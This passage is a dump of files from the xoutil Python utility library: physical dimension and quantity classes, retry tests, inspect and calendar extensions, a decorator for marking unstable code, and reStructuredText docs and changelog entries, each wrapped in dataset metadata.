type(s) for +: 'Decimal' and 'float'\n\n\nThe signature created by `Dimension`:class: for its canonical unit is simply a\nstring that varies with the name of the dimension and that of the canonical\nunit. This implies that you can *recreate* the same dimension and it will be\ninteroperable with the former::\n\n >>> @Dimension.new\n ... class L:\n ... m = UNIT\n\n >>> m = L.m # Save this\n\n\n >>> # Recreate the same dimension.\n >>> @Dimension.new\n ... class L:\n ... m = UNIT\n\n >>> m == L.m\n True\n\nBoth the dimension name and the canonical unit name *must* be the same for\nthis to work.\n\n.. 
note:: We advice to define a dimension only once and import it where\n needed.\n\n\"\"\"\n\nimport functools\nimport numbers\n\nfrom xotl.tools.objects import classproperty\n\n\n#: The unit for any kind of quantity.\nUNIT = 1\n\n\[email protected]_ordering\nclass Quantity(numbers.Real):\n \"\"\"A concrete number of `quantity` (expressed in) `units`.\n\n .. seealso:: https://en.wikipedia.org/wiki/Concrete_number\n\n :param quantity: A real number.\n :param units: A `signature <Signature>`:class: for the units the\n denominate the given quantity.\n\n You can construct instances by operating with the attributes of a\n dimension. For instance, this is 5 kilometres:\n\n >>> from xotl.tools.dim.base import L\n >>> 5 * L.km\n 5000::{<Length.metre>}/{}\n\n A concrete number is of the type of its dimension:\n\n >>> isinstance(5 * L.km, L)\n True\n\n \"\"\"\n\n __slots__ = (\"magnitude\", \"signature\")\n\n def __init__(self, quantity, units):\n if not isinstance(quantity, BareReal):\n raise TypeError(\"Quantities must be real numbers\")\n self.magnitude = quantity\n self.signature = units\n\n def __str__(self):\n return \"{}::{}\".format(self.magnitude, self.signature)\n\n __repr__ = __str__\n\n def __neg__(self):\n return type(self)(-self.magnitude, self.signature)\n\n def __pos__(self):\n return type(self)(self.magnitude, self.signature)\n\n def __add__(self, other):\n if isinstance(other, Quantity) and self.signature == other.signature:\n return type(self)(self.magnitude + other.magnitude, self.signature)\n else:\n # What is the meaning of \"10km + 1\"?\n raise OperandTypeError(\"+\", self, other)\n\n __radd__ = __add__\n\n def __sub__(self, other):\n if isinstance(other, Quantity) and self.signature == other.signature:\n return type(self)(self.magnitude - other.magnitude, self.signature)\n else:\n # What is the meaning of \"10km - 1\"?\n raise OperandTypeError(\"-\", self, other)\n\n def __mul__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, 
Signature())\n if isinstance(other, Quantity):\n return downgrade_to_scalar(\n type(self)(\n self.magnitude * other.magnitude, self.signature * other.signature\n )\n )\n else:\n raise OperandTypeError(\"*\", self, other)\n\n __rmul__ = __mul__\n\n def __pow__(self, exp):\n if isinstance(exp, numbers.Integral) and exp != 0:\n if exp < 0:\n return 1 / (self ** (-exp))\n else:\n return type(self)(self.magnitude ** exp, self.signature ** exp)\n else:\n raise OperandTypeError(\"**\", self, exp)\n\n def __div__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n if isinstance(other, Quantity):\n return downgrade_to_scalar(\n type(self)(\n self.magnitude / other.magnitude, self.signature / other.signature\n )\n )\n else:\n raise OperandTypeError(\"/\", self, other)\n\n __truediv__ = __div__\n\n def __floordiv__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n if isinstance(other, Quantity):\n return downgrade_to_scalar(\n type(self)(\n self.magnitude // other.magnitude, self.signature / other.signature\n )\n )\n else:\n raise OperandTypeError(\"//\", self, other)\n\n def __rdiv__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n return downgrade_to_scalar(\n type(self)(\n other.magnitude / self.magnitude, other.signature / self.signature\n )\n )\n else:\n raise OperandTypeError(\"/\", other, self)\n\n __rtruediv__ = __rdiv__\n\n def __rfloordiv__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n return downgrade_to_scalar(\n type(self)(\n other.magnitude // self.magnitude, other.signature / self.signature\n )\n )\n else:\n raise OperandTypeError(\"//\", other, self)\n\n def __eq__(self, other):\n if isinstance(other, BareReal) and self.signature == SCALAR:\n return self.magnitude == other\n elif isinstance(other, Quantity) and self.signature == other.signature:\n return self.magnitude == other.magnitude\n 
else:\n raise TypeError(\"incomparable quantities: %r and %r\" % (self, other))\n\n def __lt__(self, other):\n if isinstance(other, Quantity) and self.signature == other.signature:\n return self.magnitude < other.magnitude\n else:\n raise TypeError(\"incomparable quantities: %r and %r\" % (self, other))\n\n # The following make Quantity more compatible with numbers.Real. In all\n # cases, taking a Quantity for a float takes the magnitude expressed in\n # the canonical unit.\n\n def __le__(self, other):\n if isinstance(other, Quantity) and self.signature == other.signature:\n return self.magnitude <= other.magnitude\n else:\n raise TypeError(\"incomparable quantities: %r and %r\" % (self, other))\n\n def __float__(self):\n return float(self.magnitude)\n\n def __trunc__(self):\n return self.magnitude.__trunc__()\n\n def __abs__(self):\n return abs(self.magnitude)\n\n def __round__(self):\n return round(self.magnitude)\n\n def __ceil__(self):\n import math\n\n return math.ceil(self.magnitude)\n\n def __floor__(self):\n import math\n\n return math.floor(self.magnitude)\n\n def __mod__(self, other):\n if isinstance(other, BareReal):\n return type(self)(self.magnitude % other, self.signature)\n else:\n raise OperandTypeError(\"%\", self, other)\n\n def __rmod__(self, other):\n # This is a rare operation. Imagine: 5 % 2m to be 1/m.... But if I\n # can do 5/2m and that is 2.5/m, then % should be allowed.\n if isinstance(other, BareReal):\n return type(self)(other % self.magnitude, 1 / self.signature)\n else:\n raise OperandTypeError(\"%\", self, other)\n\n def __rpow__(self, other):\n raise OperandTypeError(\"**\", other, self)\n\n\nclass Dimension(type):\n \"\"\"A type for `quantities`_.\n\n This is a metaclass for dimensions. Every instance (class) will\n automatically have the following attributes:\n\n .. attribute:: _unitname_\n\n The name of canonical unit in the dimension. Notice that `aliases\n <new>`:meth: are created after the defined canonical unit. 
This is the\n name of the attribute provided in the class definition of the dimension\n with value equal to `UNIT`:const:.\n\n .. attribute:: _unit_\n\n The canonical `quantity <Quantity>`:class:. This is the quantity 1\n (`UNIT`:const:) expressed in terms of the canonical unit.\n\n .. attribute:: _signature_\n\n The canonical `signature <Signature>`:class: of the quantities.\n\n It's always true that ``Quantity(UNIT, self._signature_) == self._unit_``.\n\n .. _quantities: https://en.wikipedia.org/wiki/Concrete_numbers\n\n The provided dimension `~xotl.tools.dim.base.Length`:class: has the\n canonical quantity `1 metre`::\n\n >>> Length.metre\n 1::{<Length.metre>}/{}\n\n >>> Length._unit_ == Length.metre == Quantity(1, Length._signature_)\n True\n\n You may subclass `Dimension`:class: and customize the attribute\n ``Quantity``. The value of the attribute **should** be a subclass of\n `~xotl.tools.dim.meta.Quantity`:class: or a callable that returns\n instances of Quantity. You may provide it by fully-qualified name as\n supported by `~xotl.tools.objects.import_object`:func:.\n\n .. versionchanged:: 2.1.0 Added class-attribute Quantity.\n\n \"\"\"\n\n #: Customizable Quantity factory. 
It must be a callable that takes a\n #: number and a signature, and returns a Quantity-like object.\n Quantity = Quantity\n\n @classproperty\n def _Quantity(self):\n from xotl.tools.objects import import_object\n\n return import_object(self.Quantity)\n\n def __new__(cls, name, bases, attrs):\n wrappedattrs = {}\n Base = next((base for base in bases if isinstance(base, cls)), None)\n if Base is not None:\n unit = Base._unitname_\n signature = Base._signature_\n else:\n unit = None\n signature = Signature()\n for attr, val in attrs.items():\n if isinstance(val, BareReal):\n if val == UNIT and unit is not None:\n raise TypeError(\"quantity with multiple units\")\n if unit is None and val == UNIT:\n unit = attr\n assert not signature.top\n signature.top = (\"<{}.{}>\".format(name, unit),)\n # WARNING: In order to make a single looping structure we\n # intentionally break the signature immutability\n wrappedattrs[attr] = cls._Quantity(val, signature)\n else:\n if unit is None and isinstance(val, Quantity):\n # This is the case when I need to create the quantity from\n # operations. It's is not a public API. We also break\n # the signature immutability here.\n if val.magnitude == UNIT:\n unit = attr\n assert not signature.top and not signature.bottom\n signature.top = val.signature.top\n signature.bottom = val.signature.bottom\n wrappedattrs[attr] = val\n if unit is None:\n raise TypeError(\"dimension without a unit\")\n self = super().__new__(cls, name, bases, wrappedattrs)\n self._unitname_ = unit\n self._unit_ = getattr(self, unit)\n self._signature_ = signature\n return self\n\n @classmethod\n def new(cls, *source, **kwargs):\n \"\"\"Define a new dimension.\n\n This is a wrapped decorator. 
The actual possible signatures are:\n\n - ``new(unit_alias=None, unit_aliases=None, Quantity=None)(source)``\n\n - ``new(source)``\n\n This allows to use this method as decorator with or without arguments.\n\n :param source: A class with at least the canonical unit definition.\n Other unit definitions will be automatically converted.\n\n :keyword unit_alias: An alias for the canonical unit. You cannot use\n a `source` with several canonical units. This is\n a simple way to introduce a single alias.\n\n :keyword unit_aliases: A sequence with the name of other aliases for\n the canonical unit.\n\n :keyword Quantity: A replacement for the default Quantity of the\n dimension. It defaults to None; which then looks for the\n Quantity attribute the class definition. This allows to\n provide a custom Quantity without having to subclass\n Dimension.\n\n Example:\n\n >>> @Dimension.new(unit_alias='man')\n ... class Workforce:\n ... men = UNIT\n\n >>> Workforce.men == Workforce.man == Workforce._unit_\n True\n\n The resulting class will be an instance of `Dimension`:class::\n\n >>> isinstance(Workforce, Dimension)\n True\n\n The original class is totally missed:\n\n >>> Workforce.mro()\n [...Workforce, object]\n\n To complete the example, let's introduce the dimension Effort that\n expresses the usual amount of men-power and time needed to complete\n some task. However `~xotl.tools.dim.base.Time`:class: has the second\n as it canonical unit, but the standard for Effort is men-hour:\n\n >>> class Effort(Workforce * Time):\n ... # Since the canonical unit of a composed quantity type is\n ... # built from the canonical units of the operands, but the\n ... # true \"canonical type\" of effort is usually men-hour we\n ... # re-introduce it.\n ... men_hour = 60\n\n This does not mean that ``Effort._unit_ == Effort.men_hour``. The\n canonical unit would be ``Effort.men_second``.\n\n .. 
versionchanged:: 2.1.0 Added keyword parameter Quantity.\n\n \"\"\"\n from xotl.tools.objects import copy_class\n from xotl.tools.decorator.meta import decorator\n\n @decorator\n def _new(source, unit_alias=None, unit_aliases=None, Quantity=None):\n if Quantity is not None:\n\n class meta(cls):\n pass\n\n # Putting this inside the class fail, because 'Quantity =\n # Quantity' cannot be disambiguated with local and non-local\n # name.\n meta.Quantity = Quantity\n else:\n meta = cls\n res = copy_class(source, meta=meta)\n if unit_alias:\n setattr(res, unit_alias, res._unit_)\n if unit_aliases:\n for alias in unit_aliases:\n setattr(res, alias, res._unit_)\n return res\n\n if source and kwargs or len(source) > 1:\n raise TypeError(\"Invalid signature\")\n return _new(*source, **kwargs)\n\n def __instancecheck__(self, instance):\n if isinstance(instance, Quantity):\n return instance.signature == self._signature_\n else:\n return False\n\n def __mul__(self, other):\n if isinstance(other, Dimension):\n name = TIMES(self.__name__, other.__name__)\n if self == other:\n unit = SQUARED(self._unitname_)\n quant = self._Quantity(UNIT, self._signature_ ** 2)\n else:\n unit = TIMES(self._unitname_, other._unitname_)\n quant = self._Quantity(UNIT, self._signature_ * other._signature_)\n klass = type(self)\n return klass(name, (object,), {unit: quant})\n else:\n raise OperandTypeError(\"*\", self, other)\n\n def __pow__(self, exp):\n if isinstance(exp, numbers.Integral):\n if exp == 0:\n return Scalar\n elif exp == 1:\n return self\n elif exp == 2:\n return self * self\n elif exp < 0:\n return 1 / (self ** -exp)\n else:\n assert exp > 0\n name = POWER(self.__name__, exp)\n unit = POWER(self._unitname_, exp)\n quant = self._Quantity(UNIT, self._signature_ ** exp)\n klass = type(self)\n return klass(name, (object,), {unit: quant})\n else:\n raise OperandTypeError(\"**\", self, exp)\n\n def __div__(self, other):\n if isinstance(other, Dimension):\n if self == other:\n return Scalar\n 
else:\n name = PER(self.__name__, other.__name__)\n unit = PER(self._unitname_, other._unitname_)\n quant = self._Quantity(UNIT, self._signature_ / other._signature_)\n klass = type(self)\n return klass(name, (object,), {unit: quant})\n else:\n raise OperandTypeError(\"/\", self, other)\n\n __truediv__ = __floordiv__ = __div__\n\n def __rdiv__(self, numerator):\n assert not isinstance(numerator, Dimension)\n if numerator == 1:\n name = PER(\"unit\", self.__name__)\n unit = PER(\"unit\", self._unitname_)\n quant = self._Quantity(UNIT, 1 / self._signature_)\n klass = type(self)\n return klass(name, (object,), {unit: quant})\n else:\n raise OperandTypeError(\"/\", numerator, self)\n\n __rtruediv__ = __rfloordiv__ = __rdiv__\n\n def __eq__(self, other):\n if isinstance(other, Dimension):\n return self._signature_ == other._signature_\n else:\n raise TypeError(\n \"incomparable types '%s' and '%s'\"\n % (type(self).__name__, type(other).__name__)\n )\n\n\nclass Signature:\n \"\"\"The layout of the kinds that compose a quantity.\n\n The layout is given by a pair non-ordered collections (repetition\n is allowed): the numerator (we call it top within the signature)\n and the denominator (bottom).\n\n We represent a signature as ``{top elements}/{bottom elements}``.\n\n You may regard a signature as an abstract 'syntactical' part of a\n quantity. For Length, the ``{metre}/{}`` is the signature of such a\n quantity.\n\n The number \"10\" is not tied to any particular kind of quantity. Bare\n numbers have no kind and the bear the signature ``{}/{}``.\n\n The items of top and bottom are required to be comparable for equality\n (``==``).\n\n You can multiply and divide signatures and simplification happens\n automatically.\n\n You *should* regard signatures as immutable values. 
In fact, this is kind\n of an internal, but interesting, concept of this module.\n\n Examples::\n\n >>> distance = Signature('m')\n >>> distance\n {m}/{}\n\n >>> time = Signature('s')\n\n >>> freq = 1/time\n >>> freq\n {}/{s}\n\n >>> speed = distance/time\n >>> speed\n {m}/{s}\n\n >>> acceleration = speed/time\n >>> acceleration\n {m}/{s, s}\n\n You may compare signatures for equality.\n\n >>> acceleration == distance/(time*Signature('s'))\n True\n\n >>> speed == distance * freq\n True\n\n Signature don't support neither addition nor subtraction::\n\n >>> distance + distance # doctest: +ELLIPSIS\n Traceback (...)\n ...\n TypeError: unsupported operand type(s) for +: 'Signature' and 'Signature'\n\n \"\"\"\n\n __slots__ = (\"top\", \"bottom\")\n\n def __init__(self, top=None, bottom=None):\n self.top, self.bottom = self.simplify(top, bottom)\n\n def __eq__(self, other):\n try:\n from xotl.tools.future.collections import Counter\n except ImportError:\n from xotl.tools.collections import Counter\n if isinstance(other, type(self)):\n return Counter(self.top) == Counter(other.top) and Counter(\n self.bottom\n ) == Counter(other.bottom)\n else:\n return False\n\n def __ne__(self, other):\n return not (self == other)\n\n __hash__ = None # FIXME: Hash\n\n def __lt__(self, other):\n raise TypeError(\"signatures are not orderable\")\n\n __gt__ = __ge__ = __le__ = __lt__\n\n def __mul__(self, other):\n cls = type(self)\n if other == UNIT:\n return self\n elif isinstance(other, cls):\n return cls(self.top + other.top, self.bottom + other.bottom)\n else:\n raise TypeError\n\n __rmul__ = __mul__\n\n def __div__(self, other):\n cls = type(self)\n if other == UNIT:\n return self\n elif isinstance(other, cls):\n return cls(self.top + other.bottom, self.bottom + other.top)\n else:\n raise TypeError\n\n __truediv__ = __floordiv__ = __div__\n\n def __rdiv__(self, numerator):\n if numerator == UNIT:\n cls = type(self)\n return cls(self.bottom, self.top)\n else:\n raise TypeError\n\n 
__rtruediv__ = __rfloordiv__ = __rdiv__\n\n def __pow__(self, exp):\n if isinstance(exp, numbers.Integral):\n if exp == 0:\n return Signature()\n elif exp > 0:\n return Signature(self.top * exp, self.bottom * exp)\n else:\n return Signature(self.bottom * -exp, self.top * -exp)\n else:\n raise TypeError\n\n @staticmethod\n def simplify(top, bottom):\n \"\"\"Removes equal items from top and bottom in a one-to-one\n correspondence.\n\n Signatures are simplified on initialization::\n\n >>> Signature('abcxa', 'bxay')\n {c, a}/{y}\n\n This function takes top and bottom and returns simplified\n tuples for top and bottom.\n\n \"\"\"\n top = [] if top is None else list(top)\n bottom = [] if bottom is None else list(bottom)\n i = 0\n while i < len(top):\n j = 0\n while j < len(bottom) and bottom[j] != top[i]:\n j += 1\n if j < len(bottom):\n assert bottom[j] == top[i]\n del bottom[j]\n del top[i]\n else:\n i += 1\n return tuple(top), tuple(bottom)\n\n def __str__(self):\n wrap = lambda s: \"{{{0}}}\".format(s)\n top = wrap(\", \".join(str(t) for t in self.top))\n bottom = wrap(\", \".join(str(b) for b in self.bottom))\n return \"{top}/{bottom}\".format(top=top, bottom=bottom)\n\n __repr__ = __str__\n\n\nclass _BareRealType(type):\n def __instancecheck__(self, i):\n return isinstance(i, numbers.Real) and not isinstance(i, Quantity)\n\n\nclass BareReal(metaclass=_BareRealType):\n \"\"\"Any real that is not a Quantity instance.\"\"\"\n\n\nSCALAR = Signature()\n\n\[email protected]\nclass Scalar:\n \"\"\"A quantity whose signature is always *empty*.\n\n Most of the time you should not deal with this quantity. 
Any normal\n operation that results in a scalar gets reduced to Python's type:\n\n >>> from xotl.tools.dim.base import L\n >>> L.m/L.m\n 1.0\n\n This type makes the operations on `dimensions <Dimension>`:class: closed\n under multiplication:\n\n >>> Scalar * L == L == L * Scalar\n True\n\n \"\"\"\n\n unit = Quantity(UNIT, SCALAR)\n\n\nTIMES = lambda a, b: \"{}_{}\".format(a, b)\nPER = lambda a, b: \"{}_per_{}\".format(a, b)\nSQUARED = lambda a: \"{}_squared\".format(a)\n\n\ndef POWER(a, e):\n return \"{}_pow_{}\".format(a, e)\n\n\nclass OperandTypeError(TypeError):\n def __init__(self, operand, val1, val2):\n if isinstance(val1, Quantity):\n t1 = val1.signature\n else:\n t1 = type(val1).__name__\n if isinstance(val2, Quantity):\n t2 = val2.signature\n else:\n t2 = type(val2).__name__\n super().__init__(\n \"unsupported operand type(s) for %s: '%s' and '%s'\" % (operand, t1, t2)\n )\n\n\ndef downgrade_to_scalar(quantity):\n \"\"\"Downgrade a concrete number to a bare number if possible.\n\n .. 
note:: This is not an API of this module.\n\n \"\"\"\n if quantity.signature == SCALAR:\n return quantity.magnitude\n else:\n return quantity\n" }, { "alpha_fraction": 0.5655080080032349, "alphanum_fraction": 0.5902406573295593, "avg_line_length": 24.355932235717773, "blob_id": "c13bfb1861ebf36bc470f8f892f6fa6cb30a233c", "content_id": "cbf9cd577b65acd0bcaa05d078d39759ce32f934", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1497, "license_type": "no_license", "max_line_length": 72, "num_lines": 59, "path": "/tests/test_tasking.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom xoutil.tasking import retry\n\n\nclass FailingMock:\n def __init__(self, start=0, threshold=5, sleeper=0):\n self.start = start\n self.threshold = threshold\n self.sleeper = sleeper\n\n def __call__(self, incr=1):\n if self.sleeper:\n import time\n\n time.sleep(self.sleeper)\n self.start += incr\n if self.start < self.threshold:\n raise ValueError(self.start)\n else:\n return self.start\n\n\ndef test_retrying_max_tries_not_enough_tries():\n fn = FailingMock(threshold=1000000, sleeper=0.5)\n with pytest.raises(ValueError):\n retry(fn, max_tries=3)\n\n\ndef test_retrying_max_tries_enough_tries():\n fn = FailingMock()\n assert retry(fn, max_tries=10) == 5\n\n\ndef test_retrying_max_time_runout():\n fn = FailingMock(threshold=1000000, sleeper=0.2)\n with pytest.raises(ValueError):\n retry(fn, max_time=0.3)\n\n\ndef test_retrying_max_time():\n fn = FailingMock(sleeper=0.2)\n assert retry(fn, max_time=0.2 * 5) == 5\n\n\ndef test_signature():\n fn = FailingMock()\n with pytest.raises(TypeError):\n assert 
retry(fn, (), {}, 5)\n with pytest.raises(TypeError):\n assert retry(fn, (), {}, x=5)\n" }, { "alpha_fraction": 0.556130588054657, "alphanum_fraction": 0.5581210255622864, "avg_line_length": 28.552940368652344, "blob_id": "dc1db018afbc5dc5395e9146ad30763b55af9777", "content_id": "6b10b559e9a6c89bd0b84c6c085bb5ef4715fefc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5025, "license_type": "no_license", "max_line_length": 78, "num_lines": 170, "path": "/xotl/tools/future/inspect.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to Python's ``inspect`` module.\n\nYou may use it as drop-in replacement of ``inspect``. Although we don't\ndocument all items here. 
Refer to `inspect's <inspect>`:mod: documentation.\n\n\"\"\"\n\nfrom inspect import * # noqa\nfrom inspect import (\n _sentinel,\n _static_getmro,\n _check_instance, # noqa\n _check_class,\n _is_type,\n _shadowed_dict,\n)\n\n\ndef get_attr_value(obj, name, *default):\n \"\"\"Get a named attribute from an object in a safe way.\n\n Similar to `getattr` but without triggering dynamic look-up via the\n descriptor protocol, `__getattr__` or `__getattribute__` by using\n `getattr_static`:func:.\n\n \"\"\"\n from xotl.tools.params import check_default, Undefined\n\n default = check_default()(*default)\n is_type = isinstance(obj, type)\n res = getattr_static(obj, name, Undefined)\n if isdatadescriptor(res): # noqa\n try:\n owner = type if is_type else type(obj)\n res = res.__get__(obj, owner)\n except Exception: # TODO: @med Which expections.\n res = Undefined\n if res is Undefined and not is_type:\n cls = type(obj)\n res = getattr_static(cls, name, Undefined)\n if isdatadescriptor(res): # noqa\n try:\n res = res.__get__(obj, cls)\n except Exception: # TODO: @med Which?\n try:\n res = res.__get__(cls, type)\n except Exception: # TODO: @med Which?\n res = Undefined\n if res is not Undefined:\n return res\n elif default is not Undefined:\n return default\n else:\n msg = \"'%s' object has no attribute '%s'\"\n raise AttributeError(msg % (type(obj).__name__, name))\n\n\ndef safe_name(obj, affirm=False):\n \"\"\"Return the internal name for a type or a callable.\n\n This function is safe. 
If :param obj: is not an instance of a proper type\n then returns the following depending on :param affirm:\n\n - If ``False`` returns None.\n\n - If ``True`` convert a single object to its type before returns the name,\n but if is a tuple, list or set; returns a string with a representation\n of contained types.\n\n Examples::\n\n >>> safe_name(int)\n 'int'\n\n >>> safe_name(0) is None\n True\n\n >>> safe_name(0, affirm=True)\n 'int'\n\n >>> safe_name((0, 1.1)) is None\n True\n\n >>> safe_name((0, 1.1), affirm=True)\n '(int, float)'\n\n \"\"\"\n from types import FunctionType, MethodType\n from types import BuiltinFunctionType, BuiltinMethodType\n\n named_types = (\n FunctionType,\n MethodType,\n BuiltinFunctionType,\n BuiltinMethodType,\n type,\n )\n if isinstance(obj, (staticmethod, classmethod)):\n fn = get_attr_value(obj, \"__func__\", None)\n if fn:\n obj = fn\n if isinstance(obj, named_types):\n # TODO: Why not use directly `get_attr_value``\n try:\n res = getattr_static(obj, \"__name__\", None)\n if res:\n if isdatadescriptor(res): # noqa\n res = res.__get__(obj, type)\n except Exception:\n res = None\n if res is None:\n try:\n res = obj.__name__\n except AttributeError:\n res = None\n else:\n res = None\n if res is None:\n # TODO: Why not use directly `get_attr_value``\n # FIX: Improve and standardize the combination of next code\n res = getattr_static(obj, \"__name__\", None)\n if res and isdatadescriptor(res): # noqa\n res = res.__get__(obj, type(obj))\n if isinstance(res, str):\n return res\n elif affirm:\n if isinstance(obj, (tuple, list, set)):\n if isinstance(obj, tuple):\n head, tail = \"()\"\n elif isinstance(obj, list):\n head, tail = \"[]\"\n else:\n head, tail = \"{}\"\n items = \", \".join(safe_name(t, affirm) for t in obj)\n return str(\"%s%s%s\" % (head, items, tail))\n else:\n return safe_name(type(obj))\n else:\n return None\n\n\ndef _static_issubclass(C, B):\n \"\"\"like ``issubclass(C, B) -> bool`` but without using ABCs.\n\n Return 
whether class C is a strict subclass (i.e., a derived class) of\n class B.\n\n When using a tuple as the second argument it's a shortcut for::\n\n any(_static_issubclass(C, b) for b in B)\n\n This function returns False instead raising \"TypeError: issubclass() arg 2\n must be a class or tuple of classes\" if `B` any tuple member) is not\n instance of `type`.\n\n \"\"\"\n mro = _static_getmro(C)\n if isinstance(B, tuple):\n return any(b in mro for b in B)\n else:\n return B in mro\n" }, { "alpha_fraction": 0.6939102411270142, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 30.72881317138672, "blob_id": "e7b2fcf7ebb55f0a7635c199410133699097fff5", "content_id": "dbdf47909fb62f67b6a958f97b9c90244cd5cfdb", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1872, "license_type": "permissive", "max_line_length": 84, "num_lines": 59, "path": "/docs/source/xotl.tools/records.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=================================================\n `xotl.tools.records`:mod: - Records definitions\n=================================================\n\n.. automodule:: xotl.tools.records\n\n.. autoclass:: record\n\n.. _included-readers:\n\nIncluded reader builders\n========================\n\nThe following functions *build* readers for standards types.\n\n.. note:: You cannot use these functions themselves as readers, but you must\n\t call them to obtain the desired reader.\n\nAll these functions have a pair of keywords arguments `nullable` and\n`default`. The argument `nullable` indicates whether the value must be\npresent or not. The function `check_nullable`:func: implements this check and\nallows other to create their own builders with the same semantic.\n\n.. autofunction:: datetime_reader(format, nullable=False, default=None, strict=True)\n\n.. 
autofunction:: boolean_reader(true=('1', ), nullable=False, default=None)\n\n.. autofunction:: integer_reader(nullable=False, default=None)\n\n.. autofunction:: decimal_reader(nullable=False, default=None)\n\n.. autofunction:: float_reader(nullable=False, default=None)\n\n.. autofunction:: date_reader(format, nullable=False, default=None, strict=True)\n\nChecking for null values\n------------------------\n\n.. autofunction:: isnull\n.. autofunction:: check_nullable(val, nullable)\n\n\nThese couple of functions allows you to define new builders that use the same\nnull concept. For instance, if you need readers that parse dates in diferent\nlocales you may do::\n\n def date_reader(nullable=False, default=None, locale=None):\n\tfrom xotl.tools.records import check_nullable\n\tfrom babel.dates import parse_date, LC_TIME\n\tfrom datetime import datetime\n\tif not locale:\n\t locale = LC_TIME\n\n\tdef reader(value):\n\t if check_nullable(value, nullable):\n\t return parse_date(value, locale=locale)\n\t else:\n\t\treturn default\n\treturn reader\n" }, { "alpha_fraction": 0.5537415146827698, "alphanum_fraction": 0.559183657169342, "avg_line_length": 15.704545021057129, "blob_id": "8a380873a7e46dc0349ab4c58e3567c78b8020af", "content_id": "f4284ef2634a4ab27b1142a34b9226357eb7325e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 736, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/xotl/tools/future/calendar.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extends the standard `calendar` module.\n\nxotl.tools extensions:\n\n- Settle constants for all 
months.\n\nOriginal documentation:\n\n\"\"\"\n\nfrom calendar import * # noqa\nimport calendar as _stdlib # noqa\n\n__doc__ += _stdlib.__doc__\n\ntry:\n __all__ = list(_stdlib.__all__)\nexcept AttributeError:\n pass\n\n\n(\n January,\n February,\n March,\n April,\n May,\n June,\n July,\n August,\n September,\n October,\n November,\n December,\n) = range(1, 13)\n" }, { "alpha_fraction": 0.732758641242981, "alphanum_fraction": 0.75, "avg_line_length": 33.79999923706055, "blob_id": "b0eca534d5967520936484e54b8b6de770ca78c0", "content_id": "fa0d04e6d205ce8ff2794ad990fa44215dbf8664", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 348, "license_type": "permissive", "max_line_length": 75, "num_lines": 10, "path": "/docs/source/history/_changes-1.9.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #29: Issues with `xoutil.symbols.symbol`:class: documentation and\n implementation.\n\n- Fix bug #30: It was possible to define a dimension with two (or more)\n incompatible canonical units.\n\n- Fix bug #33: Reusing a context leaves the context unusable.\n\n- Renamed ``xoutil.tasking.StandardWait`` to\n `xoutil.tasking.ConstantWait`:class:.\n" }, { "alpha_fraction": 0.6055264472961426, "alphanum_fraction": 0.6088613867759705, "avg_line_length": 29.420289993286133, "blob_id": "6c69d39c620b016a7528de133f68872e9a25f764", "content_id": "9733c22dfcb105e12438a00bee6f0eb52532d0b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2100, "license_type": "no_license", "max_line_length": 80, "num_lines": 69, "path": "/xotl/tools/decorator/development.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright 
(c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom xotl.tools.decorator.meta import decorator\n\n\n# TODO: move to new module 'xotl.tools.hints' when fully implemented.\n\n\n@decorator\ndef unstable(target, msg=None):\n \"\"\"Declares that a method, class or interface is unstable.\n\n This has the side-effect of issuing a warning the first time the `target`\n is invoked.\n\n The `msg` parameter, if given, should be string that contains, at most,\n two positional replacement fields ({0} and {1}). The first replacement\n field will be the type of `target` (interface, class or function) and the\n second matches `target's` full name.\n\n \"\"\"\n import warnings\n from xotl.tools.names import nameof\n\n if msg is None:\n msg = (\n \"The {0} `{1}` is declared unstable. \"\n \"It may change in the future or be removed.\"\n )\n try:\n from zope.interface import Interface\n except ImportError:\n from xotl.tools.symbols import Ignored as Interface\n if isinstance(target, type(Interface)):\n objtype = \"interface\"\n elif isinstance(target, type):\n objtype = \"class\"\n else:\n objtype = \"function or method\"\n message = msg.format(objtype, nameof(target, inner=True, full=True))\n if isinstance(target, type) or issubclass(type(target), type(Interface)):\n\n class meta(type(target)):\n pass\n\n def new(*args, **kwargs):\n warnings.warn(message, stacklevel=2)\n return target.__new__(*args, 